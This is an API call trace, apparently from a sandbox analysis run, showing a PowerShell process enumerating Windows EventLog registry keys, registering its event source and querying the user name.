	[0203.222] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.222] CoTaskMemFree (pv=0x288f70) 
	[0203.222] CoTaskMemFree (pv=0x0) 
	[0203.222] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.222] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.222] CoTaskMemFree (pv=0x288f70) 
	[0203.222] CoTaskMemFree (pv=0x0) 
	[0203.222] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.222] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.222] CoTaskMemFree (pv=0x288f70) 
	[0203.222] CoTaskMemFree (pv=0x0) 
	[0203.222] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.222] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.222] CoTaskMemFree (pv=0x288f70) 
	[0203.222] CoTaskMemFree (pv=0x0) 
	[0203.222] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.222] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.222] CoTaskMemFree (pv=0x288f70) 
	[0203.222] CoTaskMemFree (pv=0x0) 
	[0203.222] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.222] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.222] CoTaskMemFree (pv=0x288f70) 
	[0203.222] CoTaskMemFree (pv=0x0) 
	[0203.223] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.223] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.223] CoTaskMemFree (pv=0x288f70) 
	[0203.223] CoTaskMemFree (pv=0x0) 
	[0203.223] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.223] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.223] CoTaskMemFree (pv=0x288f70) 
	[0203.223] CoTaskMemFree (pv=0x0) 
	[0203.223] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x344) returned 0x0
	[0203.223] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.223] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x348) returned 0x0
	[0203.223] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.223] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x34c) returned 0x0
	[0203.223] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.223] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x350) returned 0x0
	[0203.223] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.223] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x354) returned 0x0
	[0203.224] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.224] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x358) returned 0x0
	[0203.224] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.224] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x5
	[0203.236] RegOpenKeyExW (in: hKey=0x340, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x35c) returned 0x0
	[0203.236] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.236] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x360) returned 0x0
	[0203.236] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x364) returned 0x0
	[0203.243] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd5d8 | out: phkResult=0xdd5d8*=0x360) returned 0x0
	[0203.243] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xdd54c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xdd548, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xdd54c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xdd548*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.243] CoTaskMemFree (pv=0x0) 
	[0203.243] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.243] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.244] CoTaskMemFree (pv=0x288f70) 
	[0203.244] CoTaskMemFree (pv=0x0) 
	[0203.244] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.245] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.246] CoTaskMemFree (pv=0x288f70) 
	[0203.246] CoTaskMemFree (pv=0x0) 
	[0203.246] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.246] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.247] CoTaskMemFree (pv=0x288f70) 
	[0203.247] CoTaskMemFree (pv=0x0) 
	[0203.247] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.247] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.248] CoTaskMemFree (pv=0x288f70) 
	[0203.248] CoTaskMemFree (pv=0x0) 
	[0203.249] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.249] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.250] CoTaskMemFree (pv=0x288f70) 
	[0203.250] CoTaskMemFree (pv=0x0) 
	[0203.250] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.250] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.251] CoTaskMemFree (pv=0x288f70) 
	[0203.251] CoTaskMemFree (pv=0x0) 
	[0203.251] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.251] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.252] CoTaskMemFree (pv=0x288f70) 
	[0203.252] CoTaskMemFree (pv=0x0) 
	[0203.253] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.253] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.254] CoTaskMemFree (pv=0x288f70) 
	[0203.289] CoTaskMemFree (pv=0x0) 
	[0203.289] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.289] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.292] CoTaskMemFree (pv=0x288f70) 
	[0203.292] CoTaskMemFree (pv=0x0) 
	[0203.292] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x340) returned 0x0
	[0203.293] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.293] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x364) returned 0x0
	[0203.293] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.293] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x368) returned 0x0
	[0203.293] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.293] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x36c) returned 0x0
	[0203.293] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.293] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x370) returned 0x0
	[0203.293] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.293] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x374) returned 0x0
	[0203.293] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.293] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x5
	[0203.304] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x378) returned 0x0
	[0203.305] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x0) returned 0x2
	[0203.305] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x37c) returned 0x0
	[0203.305] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd638 | out: phkResult=0xdd638*=0x380) returned 0x0
	[0203.305] RegCloseKey (hKey=0x380) returned 0x0
	[0203.305] RegCloseKey (hKey=0x360) returned 0x0
	[0203.305] RegCloseKey (hKey=0x37c) returned 0x0
	[0203.307] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd5a8 | out: phkResult=0xdd5a8*=0x37c) returned 0x0
	[0203.307] RegQueryInfoKeyW (in: hKey=0x37c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xdd51c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xdd518, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xdd51c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xdd518*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.307] CoTaskMemFree (pv=0x0) 
	[0203.307] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.307] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x0, lpName=0x288f70, lpcchName=0xdd5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xdd5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.307] CoTaskMemFree (pv=0x288f70) 
	[0203.307] CoTaskMemFree (pv=0x0) 
	[0203.307] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.307] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x1, lpName=0x288f70, lpcchName=0xdd5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xdd5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.307] CoTaskMemFree (pv=0x288f70) 
	[0203.307] CoTaskMemFree (pv=0x0) 
	[0203.307] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.307] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x2, lpName=0x288f70, lpcchName=0xdd5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xdd5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.307] CoTaskMemFree (pv=0x288f70) 
	[0203.307] CoTaskMemFree (pv=0x0) 
	[0203.307] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.307] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x3, lpName=0x288f70, lpcchName=0xdd5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xdd5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.307] CoTaskMemFree (pv=0x288f70) 
	[0203.307] CoTaskMemFree (pv=0x0) 
	[0203.307] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.307] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x4, lpName=0x288f70, lpcchName=0xdd5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xdd5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.307] CoTaskMemFree (pv=0x288f70) 
	[0203.307] CoTaskMemFree (pv=0x0) 
	[0203.307] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.308] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x5, lpName=0x288f70, lpcchName=0xdd5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xdd5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.308] CoTaskMemFree (pv=0x288f70) 
	[0203.308] CoTaskMemFree (pv=0x0) 
	[0203.308] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.308] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x6, lpName=0x288f70, lpcchName=0xdd5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xdd5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.308] CoTaskMemFree (pv=0x288f70) 
	[0203.308] CoTaskMemFree (pv=0x0) 
	[0203.308] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.308] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x7, lpName=0x288f70, lpcchName=0xdd5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xdd5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.308] CoTaskMemFree (pv=0x288f70) 
	[0203.308] CoTaskMemFree (pv=0x0) 
	[0203.308] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.308] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x8, lpName=0x288f70, lpcchName=0xdd5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xdd5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.308] CoTaskMemFree (pv=0x288f70) 
	[0203.308] CoTaskMemFree (pv=0x0) 
	[0203.308] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x360) returned 0x0
	[0203.308] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x0) returned 0x2
	[0203.308] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x380) returned 0x0
	[0203.308] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x0) returned 0x2
	[0203.308] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x384) returned 0x0
	[0203.308] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x0) returned 0x2
	[0203.309] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x388) returned 0x0
	[0203.309] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x0) returned 0x2
	[0203.309] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x38c) returned 0x0
	[0203.309] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x0) returned 0x2
	[0203.309] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x390) returned 0x0
	[0203.333] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x0) returned 0x2
	[0203.333] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x0) returned 0x5
	[0203.342] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x374) returned 0x0
	[0203.343] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x0) returned 0x2
	[0203.343] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x378) returned 0x0
	[0203.343] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd608 | out: phkResult=0xdd608*=0x38c) returned 0x0
	[0203.343] RegCloseKey (hKey=0x38c) returned 0x0
	[0203.343] RegCloseKey (hKey=0x37c) returned 0x0
	[0203.343] RegCloseKey (hKey=0x378) returned 0x0
	[0203.369] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b940008
	[0203.376] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e5bf48*="WSMan", lpRawData=0x2e5bcb8) returned 1
	[0203.512] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0203.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.512] CoTaskMemFree (pv=0x27d0e0) 
	[0203.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.514] CoTaskMemAlloc (cb=0x804) returned 0x1b8700e0
	[0203.515] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8700e0, nSize=0xdd898 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xdd898) returned 0x1
	[0203.538] CoTaskMemFree (pv=0x1b8700e0) 
	[0203.538] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.538] GetUserNameW (in: lpBuffer=0x288f70, pcbBuffer=0xdd8d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xdd8d8) returned 1
	[0203.540] CoTaskMemFree (pv=0x288f70) 
	[0203.541] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e618d8*="Alias", lpRawData=0x2e61668) returned 1
	[0203.978] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0203.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.978] CoTaskMemFree (pv=0x27d0e0) 
	[0203.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
